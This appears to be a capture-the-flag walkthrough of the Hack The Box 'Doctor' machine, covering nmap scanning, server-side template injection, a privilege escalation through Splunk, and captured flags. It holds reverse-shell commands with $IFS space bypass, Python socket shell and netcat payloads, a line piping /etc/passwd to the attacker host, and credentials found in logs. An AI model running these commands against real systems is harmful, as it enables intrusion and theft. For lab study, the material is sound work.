NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 20:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating Ping Scan at 20:49
Scanning 10.10.10.209 [4 ports]
Completed Ping Scan at 20:49, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:49
Scanning doctors.htb (10.10.10.209) [1000 ports]
Discovered open port 22/tcp on 10.10.10.209
Discovered open port 80/tcp on 10.10.10.209
Discovered open port 8089/tcp on 10.10.10.209
Completed SYN Stealth Scan at 20:50, 16.75s elapsed (1000 total ports)
Initiating Service scan at 20:50
Scanning 3 services on doctors.htb (10.10.10.209)
Completed Service scan at 20:50, 37.92s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against doctors.htb (10.10.10.209)
Retrying OS detection (try #2) against doctors.htb (10.10.10.209)
Initiating Traceroute at 20:51
Completed Traceroute at 20:51, 0.38s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:51
Completed Parallel DNS resolution of 2 hosts. at 20:51, 0.23s elapsed
NSE: Script scanning 10.10.10.209.
Initiating NSE at 20:51
Completed NSE at 20:51, 12.07s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 2.48s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Nmap scan report for doctors.htb (10.10.10.209)
Host is up (0.31s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
| http-server-header:
| Apache/2.4.41 (Ubuntu)
|_ Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open ssl/http Splunkd httpd
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after: 2023-09-06T15:57:27
| MD5: db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 - 3.1 (86%), Linux 2.6.39 - 3.2 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 16.009 days (since Fri Sep 11 20:37:56 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 372.46 ms 10.10.14.1
2 371.49 ms doctors.htb (10.10.10.209)
NSE: Script Post-scanning.
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.94 seconds
Raw packets sent: 2089 (95.608KB) | Rcvd: 46 (2.824KB)
PORT 80
Here we have nothing to check so lets go further and add doctors.htb to our hosts file and see what we have
Here we have login page Now lets see on
Port 8089
Here we have splunk normal website with not login creds and all
Now lets enumerate through login page of doctors.htb
Here we dont have anything except info@doctors.htb
Now lets create a user and log into the website
Now login
we see only mew message area lets check that
as we see above if we post anything we will get it printed out there
also we can try vulners but wont work here lets check for SSTI
because if we see that messaging apps can have XSS SSTI and many more as we dont have xss here so lets go for SSTI
Here we entered our basic payload to check for SSTI
to get that you can use this link
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Here if we got 49 as our reply then it would be conformed that their is SSTI
but where do we have to check its output as it is not on this page
If you check source code we will have a another directory named /archive
Here in its source code we got 49 as reply
Now lets use some payloads to get shell using the above links
Lets try if we could use this basic command
┌─[✗]─[root@liquid]─[~/Desktop/HTB/doctor] └──╼ #nc -lnvp 80 listening on [any] 80 ... connect to [10.10.14.219] from (UNKNOWN) [10.10.10.209] 52932 GET / HTTP/1.1 Host: 10.10.14.219 User-Agent: curl/7.68.0 Accept: */*
lets add basic command ‘id’ in it
┌─[root@liquid]─[~/Desktop/HTB/doctor] └──╼ #nc -lnvp 80 listening on [any] 80 ... connect to [10.10.14.219] from (UNKNOWN) [10.10.10.209] 52960 GET /uid=1001(web) HTTP/1.1 Host: 10.10.14.219 User-Agent: curl/7.68.0 Accept: */*
Here we got our output as web now lets get shell through this
as while using command for shell we are not allowed to use spaces so to bypass that we have a command “$IFS” for spaces tabs and all
but still nc wont work her so using a nudge from HTB forum we can use “nc.traditional”
whole command will look like this
curl http://10.10.14.XXX/$(‘nc.traditional’$IFS’10.10.14.XXX’$IFS’9004’$IFS’-e/bin/sh’)
┌─[✗]─[root@liquid]─[~/Desktop/HTB/doctor]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
connect to [10.10.14.219] from (UNKNOWN) [10.10.10.209] 46942
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@doctor:~$
Here we go with our shell
Now here we need user shaun access for user flag
lets just download linpeas in and run that
LINPEAS.sh
web@doctor:/tmp$ wget http://10.10.14.219/linpeas.sh wget http://10.10.14.219/linpeas.sh --2020-09-27 19:40:59-- http://10.10.14.219/linpeas.sh Connecting to 10.10.14.219:80... connected. HTTP request sent, awaiting response... 200 OK Length: 161297 (158K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[===================>] 157,52K 34,1KB/s in 4,6s 2020-09-27 19:41:05 (34,1 KB/s) - ‘linpeas.sh’ saved [161297/161297] web@doctor:/tmp$ chmod +x linpeas.sh chmod +x linpeas.sh web@doctor:/tmp$ ./linpeas.sh
So in log files we got some password like this using linpeas
[+] Finding passwords inside logs (limit 70) Binary file /var/log/apache2/access.log.11.gz matches Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001.journal matches Binary file /var/log/kern.log.2.gz matches Binary file /var/log/kern.log.4.gz matches Binary file /var/log/syslog.3.gz matches /var/log/apache2/access.log:10.10.14.165 - - [27/Sep/2020:18:25:24 +0200] "GET /reset_password HTTP/1.1" 200 1814 "-" "gobuster/3.0.1" /var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password" /var/log/auth.log.1:Sep 22 13:01:23 doctor sshd[1704]: Failed <---------------->
POST /reset_password?email=Guitar123
Just use this to get user shaun access
USER ACCESS
web@doctor:/tmp$ su shaun su shaun Password: Guitar123 shaun@doctor:/tmp$ cd cd shaun@doctor:~$ cat user.txt cat user.txt c75e402f70f60093xxxxxxxxxxxxxx shaun@doctor:~$
Here we go with user flag
Now if we use pspy64 we will see that splunk is running by root
Now for that we have a git repo from where we can exploit that
here we just need to transfer the file to machine and run that binary
But when you will run you will see that there is some base64 encoded text in these lines
-H $'Host: 127.0.0.1:8089' -H $'Connection: close' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'User-Agent: python-requests/2.18.4' -H $'Content-Length: 60' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Authorization: Basic c2hhdW46R3VpdGFyMTIz' \
YWRtaW46Y2hhbmdlbWUK >> admin:changeme
These are default creds for splunk which in our case wont work as they are changed so just base64 decode this
shaun:Guitar123 >> c2hhdW46R3VpdGFyMTIz
Just replace this and then run that exploit again
ROOT ACCESS
shaun@doctor:/tmp$ chmod +x splunk.sh chmod +x splunk.sh shaun@doctor:/tmp$ ./splunk.sh ./splunk.sh [!] SPLUNK LOCAL PRIVESC [!] <-----------------------> [!] If all went well run /tmp/.tester/bin/shdoor -p for a root shell [!] Run whoami if your prompt didn't change... [!] DELETE THE .tester DIRECTORY AS ROOT WHEN YOU'RE DONE! [!] shaun@doctor:/tmp$ /tmp/.tester/bin/shdoor -p /tmp/.tester/bin/shdoor -p # is is /tmp/.tester/bin/shdoor: 1: is: not found # id id uid=1002(shaun) gid=1002(shaun) euid=0(root) groups=1002(shaun) # cd /root cd /root # cat root.txt cat root.txt 2f72635dd8e28780xxxxxxxxxxxxxxxxxx #
Here we go with our root flag!!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
.
.
.
.
Note : To try some SSTI payloads
${import os;os.popen("whoami").read() }
${{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{%import socket,subprocess,os%}{{s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.219",9004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'}}
<script>document.location=http://10.10.14.219:9004; echo "hi" | /bin/nc.traditional 10.10.14.219 9004 -e / bin / bash#'
{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('cat /etc/passwd | nc 10.10.14.219 9004')['read']() == 'chiv' %} a {% endif %}
They wont work here but they will work on another SSTI
